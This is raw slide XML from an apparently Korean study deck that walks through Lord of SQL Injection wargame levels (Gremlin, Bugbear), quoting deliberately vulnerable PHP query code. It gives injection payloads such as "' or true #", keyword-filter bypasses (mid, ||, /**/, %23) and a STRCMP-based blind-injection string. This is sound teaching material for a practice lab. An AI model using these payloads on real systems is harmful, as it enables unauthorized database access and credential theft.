          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304554" y="5019062"/>
            <a:ext cx="8514329" cy="136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 $result = @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>($query));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>위의 쿼리문을 통해 반환된 배열을 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>result </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>변수에 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="16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6224FAC-3162-4243-8C08-FEE1998B8B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304554" y="5019062"/>
            <a:ext cx="8514329" cy="136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  if($result['id']) solve("gremlin");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>변수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>result['id’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 값이 존재하면 문제가 해결된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0"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C8F20E-0426-44F3-B486-7D44495E712A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304554" y="1912448"/>
            <a:ext cx="5059534" cy="4349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0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8" grpId="0" build="p"/>
      <p:bldP spid="18" grpId="1" build="p"/>
      <p:bldP spid="19" grpId="0" build="p"/>
      <p:bldP spid="19" grpId="1" build="p"/>
      <p:bldP spid="20" grpId="0" build="p"/>
      <p:bldP spid="20" grpId="1" build="p"/>
      <p:bldP spid="21" grpId="0" build="p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 (Gremlin)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AECF-D173-429D-B32A-09F5AEBA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Injection =&gt; id=' or true #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>select id from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>prob_gremlin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where id='{$_GET[id]}' and pw='{$_GET[pw]}’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select id from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>prob_gremlin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or true #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> and pw='{$_GET[pw]}'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8A5C1-E47F-4B71-BE21-671CE51E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6" y="3250262"/>
            <a:ext cx="8298507" cy="5192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97B414-C432-49C1-805B-1B08D3591442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380311" y="3356992"/>
            <a:ext cx="1340941" cy="2880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CFF96F-06CE-4A2D-8453-4F4C1613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3898730"/>
            <a:ext cx="6696744" cy="25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5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 (Gremlin)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AECF-D173-429D-B32A-09F5AEBA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en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Percent-Encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>방식을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# : %23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026FF-BDDC-4284-82A4-2A0372EA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13" y="1988840"/>
            <a:ext cx="8298000" cy="5122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207AE7-18A3-423F-88F5-182403A297DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7164289" y="2132856"/>
            <a:ext cx="1512168" cy="24794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2F3B0B-FB50-43CC-9A1A-AAA536571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4" y="2777714"/>
            <a:ext cx="7914971" cy="35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FD04-83BF-4D1D-BA6A-6127E0AB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13 (Bugbear)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5363B-66D9-4AAB-9927-833F30AC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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="_x368829584" descr="EMB00001e2c32bd">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DCFE87-D97D-4F80-9410-550659C5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1244"/>
            <a:ext cx="8496944" cy="446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046BF2-0F81-47C7-AD86-0F14787DC3A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="3204000"/>
            <a:ext cx="5832647" cy="496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80D512-E085-40FA-9F3D-4A6F5EF18FDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="4139825"/>
            <a:ext cx="3960440" cy="16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DA47C3-2BD3-434F-B869-6A9F3A6E19B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="4444064"/>
            <a:ext cx="3672408" cy="16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FE748-9AA7-4A55-B4C7-8075E6CF7264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470396" y="3668016"/>
            <a:ext cx="6981924" cy="16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290B42-90D9-4A1A-A4AF-23CE1B829FD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="4590000"/>
            <a:ext cx="5688632" cy="16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F52D8E-D159-49F5-8F52-B79FDEC1AC4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="4901536"/>
            <a:ext cx="5256584" cy="1602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7459A9B-193C-496A-930F-A4558D95169E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304554" y="5511984"/>
            <a:ext cx="8514329" cy="86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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>preg_match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kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>‘, substring, =, or, and, space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>가 필터링 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="16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8E637B9-70FF-4BD8-B433-05558D6C6120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304553" y="5511984"/>
            <a:ext cx="8514329" cy="86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 where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>방식을 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>값을 전달할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="16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B30E3C3-D9E7-4611-8A8C-3C883BA7BDCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304552" y="5509062"/>
            <a:ext cx="8514329" cy="86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 if($result['id']) echo "&lt;h2&gt;Hello {$result[id]}&lt;/h2&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - echo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 의해 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>Hello _____</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>이 출력된다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>. -&gt; Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> injection</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="16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7C25FEAA-1936-429D-A58F-DC878552A848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304550" y="5509062"/>
            <a:ext cx="8514329" cy="86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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>addslashed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kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>문자열에 있는 작은따옴표를 이스케이프 시키는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="16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01024F42-6B53-4C1A-95EC-4500D841AC00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304548" y="5509062"/>
            <a:ext cx="8514329" cy="86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 where id='admin' and pw='{$_GET[pw]}'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>방식을 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 값을 전달한다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="16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0B5A367-2339-43C6-BE70-1ECC9BCC7EC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304546" y="5506140"/>
            <a:ext cx="8514329" cy="86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 if(($result['pw']) &amp;&amp; ($result['pw'] == $_GET['pw'])) solve("bugbear");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>      - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$result['pw']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 값이 있고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>$result['pw'] == $_GET['pw']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>이 참일 때 해결된다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>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0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533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7" grpId="0" build="p"/>
      <p:bldP spid="17" grpId="1" build="allAtOnce"/>
      <p:bldP spid="18" grpId="0" build="p"/>
      <p:bldP spid="18" grpId="1" build="allAtOnce"/>
      <p:bldP spid="19" grpId="0" build="p"/>
      <p:bldP spid="19" grpId="1" build="allAtOnce"/>
      <p:bldP spid="20" grpId="0" uiExpand="1" build="p"/>
      <p:bldP spid="20" grpId="1" build="allAtOnce"/>
      <p:bldP spid="21" grpId="0" uiExpand="1" build="p"/>
      <p:bldP spid="21" grpId="1" build="allAtOnce"/>
      <p:bldP spid="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13 (Bugbear)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AECF-D173-429D-B32A-09F5AEBA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$_GET[pw] =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en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>($_GET[pw]); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>$query = "select pw from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>prob_bugbear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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                  where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id='admin' and pw='{$_GET[pw]}’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>”; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    $result = @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>($query)); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    if(($result['pw']) &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result['pw'] == $_GET['pw']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)) solve("bugbear");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  - pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 넘겨지는 값에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>가 포함되어 있으면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>가 추가된다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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>따라서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result['pw'] == $_GET['pw’] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 조건이 거짓이 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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>그러므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>의 정확한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>를 구해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>에 넘겨줘야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-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>정확한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>를 구하기 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>파이썬 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>Brute Force Attack + Blind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Injection	</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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83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9543-DDBF-44FC-9FF7-CFE6EF5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13 (Bugbear)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AECF-D173-429D-B32A-09F5AEBA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Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 위해 사용될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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>pw, no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>에 값을 전달해서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Injection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preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>('/\'|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>substr|ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>|=|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>or|and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>| |like|0x/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>', $_GET[no])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>가 필터링 되므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>no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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>⇔ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 함수 ⇔ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>mid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/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> ⇔ 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2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> ⇔ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> ⇔ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>/**/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" dirty="0"/>
              <a:t>?no=1 or (1-STRCMP(mid(pw,1,1),”a”))%2 %23;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>∵ </a:t>
            </a:r>
            <a:r>
